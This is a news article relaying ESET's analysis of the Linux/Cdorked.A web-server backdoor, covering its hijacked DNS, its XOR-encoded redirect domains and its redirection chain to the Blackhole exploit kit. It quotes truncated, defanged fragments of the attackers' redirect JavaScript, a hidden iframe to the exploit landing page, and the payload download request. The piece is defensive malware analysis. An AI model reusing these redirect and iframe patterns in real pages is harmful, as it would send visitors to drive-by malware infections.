4 mins read

Linux/Cdorked.A malware: Lighttpd and nginx web servers affected, reports ESET

ESet logoESET, global provider of security solutions for businesses and consumers, says as reported that Linux/Cdorked.A malware has affected many web servers. The malware has drove its way into 50 most popular websites ranked in Alexa’s top 100,000.

ESET has made further significant discoveries on this sophisticated and stealthy backdoor designed to drive traffic to malicious websites–

  • ESET have observed more than 400 webservers infected with Linux/Cdorked.A. Out of these, 50 are ranked in Alexa’s top 100,000 most popular websites.
  • The backdoor has been applied to other webserver daemons. Thanks to the information provided by affected system administrators, we were able to analyze trojanized Lighttpd andnginx binaries in addition to the already documented Apache binaries.
  • According to our global telemetry data, this operation has been active since at least December 2012.
  • The Linux/Cdorked.A threat is even more stealthy than it was first thought of: By analysing how the attackers are configuring the backdoor, ESET found it will not deliver malicious content if the victim’s IP address is in a very long list of blacklisted IP ranges, nor if the victim’s internet browser’s language is set to Japanese, Finnish, Russian and Ukrainian, Kazakh or Belarusian.
  • ESET’s telemetry data shows that almost 100,000 users of ESET security products have browsed infected websites due to Linux/Cdorked.A redirection, although the attack was blocked by those products.
  • In some of the configurations ESET was able to analyze, specific redirections were configured for Apple iPad and iPhone users.

DNS Hijacking

The URLs set on the Linux/Cdorked.A infected servers change frequently. However ESET noticed three things:

1. The domain often looks like <number(s), a, b or c><letters>.<tld>.

2. The subdomain always matches a 16 character hexadecimal string.

3. The name servers of these domains change much less frequently than the domains themselves.

So ESET team began analysing the pattern of the domain name used as target of the redirection. First, the team realised that the numbers at the beginning of the domains were simply because the servers hosting these sites were shared hosting servers, and, when sorting the domains alphabetically, were the first associated with the IP address of the server.

The peculiar format of the subdomains and the fact that they are constantly changing strongly suggested that the DNS servers were also compromised. We did some tests where we modified the characters of the subdomain and in some cases the IP address in the response changed. With some more testing we were able to confirm that the IP address returned by the DNS request is actually encoded in the subdomain itself. It is using the characters at odd positions to form a 4 bytes long hex string to decode the IP address from. A basic chained XOR cipher is used to encode the IP address.

The decoding algorithm looks like this:

byte[] = { 16, 70, 183, 11 } // From the hex string

seed = 49 // This seed changes, we have not yet found where it comes for

ip[0] = seed ^ byte[0]    // 33

ip[1] = byte[0] ^ byte[1] // 86

ip[2] = byte[1] ^ byte[2] // 241

ip[3] = byte[2] ^ byte[3] // 188

// This gives us a response with IP

Due to the algorithmic nature of this behavior, we see no other explanation than the presence of trojanized DNS server binaries on the nameservers involved in Linux/CDorked.A. ESET has notified the affected parties about this issue.

Redirection Chain

When visitors are redirected by Linux/Cdorked.A they pass through multiple pages before reaching the Blackhole Exploit kit. The following screenshot shows an example redirection chain.

The first page is /index.php with a base64 encoded parameter documented in our last article. In the example in the previous screenshot, the base64 would decode to


&surl=somedomain.com &sport=80&key=ED143377&suri=/tr/zeki.htm.

That first page contains JavaScript code that will redirect the user to the second page.

var iflag = “0”; if (top!=self) { iflag = “1”; };

var b64str = “MTQxNDExMzA1MDIyMjQ4M…luLmNvbS9zb3J0LnBocA==”;

setTimeout ( function() { location.replace( “hxxp://ae334b05c4249f38” + iflag

+ b64dec(b64str) ); }, 280);

The URL for the second page is composed of 3 parts: the initial subdomain, the iflag value and the b64str variable provided by the server. The iflag value is set to 1 if the current document is the top window in the browser. The server would likely reject requests in such cases. The content of b64str is provided by the server and contains an URL with a very long subdomain part:


This third part contains some specific information about the current redirection, such as the the src id from the Linux/Cdorked.A initial URL and a timestamp. The significance of the other characters is still currently unknown.

The third page, sort.php, sets a timeout to redirect the user to the fourth page, exit.php.

function gotime() { xflag=false; top.location.replace(b64dec(“aHR0cDovL2FlMzM0YjA1YzQyNDlmM...

…cD94PTEzNyZ0PXRpbWVvdXQ=”)); };

var timer=setTimeout(“gotime()”, 21000);

var ewq;



setTimeout(function() { document.body.insertBefore(ewq,document.body.lastChild); }, 504);

aHr…XQ= : hxxp://ae334b05c4249f38014141130…


Content of a typical sort.php page.

This page shows pornographic images and links to pornographic websites and contains an iframe leading right into the Blackhole landing page. It is still unclear if the pornographic domains are actually malicious or part of a referral program.

PGI…j4= : <iframe src=”hxxp://ae334b05c4249f38014141130502224830…


width=”120″ height=”21″ marginwidth=”0″ marginheight=”0″ frameborder=”0″

scrolling=”no” allowtransparency=”true”></iframe><br>

iframe leading to the Blackhole landing page.

Finally, if the Blackhole exploit pack is successful, a piece of malware is downloaded on the victim’s computer.

GET /get3.php?e=176541242&tc=1305022250-072800c977&uid=536201305032119591656771 HTTP/1.0

Host: ae334b05c4249f38.somedomain.com

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

ESETs tests and telemetry data show that the malware that is currently being installed by the Blackhole exploit pack is Win32/Glupteba.G.


ESET has published a tool to dump the configuration of Linux/Cdorked.A if it is found running on a webserver. ESET updated it last week to detect all variants we are aware of, including nginx and Lighttpd. 

As for web users, ESET recommends keeping browsers, browser extensions, operating systems, and third party software like Java, PDF readers and Flash players fully up-to-date to avoid being infected by this on-going campaign. Use of an antivirus program is also recommended.

%d bloggers like this: